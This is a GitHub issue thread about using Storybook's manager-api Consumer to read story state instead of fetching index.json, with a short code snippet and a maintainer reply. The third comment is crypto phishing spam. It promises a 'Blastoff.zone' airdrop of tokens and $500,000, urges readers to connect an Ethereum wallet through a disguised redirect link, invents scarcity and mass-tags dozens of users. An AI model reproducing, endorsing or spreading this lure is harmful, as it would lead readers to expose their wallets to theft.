### ISSUE TITLE
Use Consumer instead of fetching of index.json

### ISSUE THREAD

**Issue by Aracturat** [varya/storybook-8-sidebar-statuses#1]
Recenty, I have developed almost the same solution for my internal storybook project.

But I used `Consumer` to get internal storybook state instead of fetching of `index.json`:

```js
import {Consumer} from '@storybook/manager-api';

const mapper = (combo) => combo.state.index;

function renderLabel(item) {
    return (
        <Consumer filter={mapper}>
            {(stories) => {
                ...
            }}
        </Consumer>
    );
}

 ```

**Comment by varya** [comment]
@Aracturat Thanks for the tip! I provided the code changes https://github.com/varya/storybook-8-sidebar-statuses/pull/2/files

**Comment by manubouillon** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://aq-3d.wikidot.com/%0a/app.blastofflzone.com/referral/)

# Blastoff.zone: Claim Your Share of 1 Million Tokens and $500,000!

Congratulations! You've just unlocked an exclusive opportunity to claim your share of 1 million tokens and a staggering $500,000 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://aq-3d.wikidot.com/%0a/app.blastofflzone.com/referral/) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500,000 bonus.
3. Use the "Claim Now" option to secure your tokens and cash in on the rewards.

This offer is limited and won't be available for long, so act now to maximize your gains!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 1 million tokens already claimed, seize this incredible opportunity before it's too late!
arthurzwl, @Endcat, @ttkienn, @ezeamaka2, @restuwahyu13, @JimmyRitter, @DavidSolomon22, @luislucena16, @undefinedZNN, @pcw109550, @monkeycatdog, @jeromyfriedman, @eprdude, @adelura, @cooaer, @jcnmsg, @simlevesque, @XSAM, @teodorstupnicki, @Khurana-Tarun, @Senshii, @iyuki22, @mikefaust, @bhargavaman, @vpistis, @shivenmian, @zxx, @21428122, @AlvaroRetuerta97, @coderminer, @atticoos, @regchiu, @rosatiara, @oswaldb22, @KatherineGirona, @SecLoop, @caiji00, @Peggy2344, @AleeyuDev, @yerffejytnac, @revell29, @oleggrunin, @yatsu, @autumn84, @dmbyun, @apgiorgi, @sharia-design, @TheShining, @jung-han, @ZhaoGuan
